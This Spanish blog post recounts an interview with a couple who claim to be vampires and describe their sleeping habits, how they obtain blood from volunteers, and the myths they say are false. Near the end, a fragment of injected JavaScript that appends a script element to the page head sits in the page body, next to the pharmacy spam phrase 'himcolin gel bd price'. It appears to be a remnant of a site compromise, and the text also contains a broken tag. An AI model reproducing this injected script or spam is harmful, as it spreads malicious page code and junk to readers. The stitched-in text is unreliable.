Home / Publicaciones / Curiosidades / Una Pareja Afirma Que Son Vampiros

Una Pareja Afirma Que Son Vampiros

Una pareja afirma que son vampiros y que la verdad sobre como viven los vampiros, es diferente a lo que la gente piensan< !more> o ven en la televisión.
Según Vanian y Ethereal la pareja de supuestos vampiros, pasan todo el día durmiendo pero no en ataúdes, sino en una cama normal.
La manera de obtener la sangre que necesitan para poder seguir viviendo su vida de vampiros, la obtienen de personas voluntarias de sobrenombre “Los Cisnes Negros” por la sociedad de vampiros, estos les otorgan una gota de su sangre a la vez.
Dicen que no se llenan de hartan de sangre como en la televisión o cine, porque demasiada sangre les provocaría vomitar.
Según Vanian de 53 años en vez de utilizar los colmillos utilizan una navaja para extraer sangre de su cónyuge también de las carnes rojas que son parte de su dieta.
En la entrevista que le realizaron, dicen que están dispuestos a desmentir los demás mitos sobre los vampiros, por ejemplo: que no pueden entrar a las iglesias o que no tienen reflejo en los espejos.

vampiros
Foto: Dailymail
if (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s); himcolin gel bd price

About Juan Pablo Martinez

Analista de sistemas y webmaster de hobby, siempre en la búsqueda del moro perdido...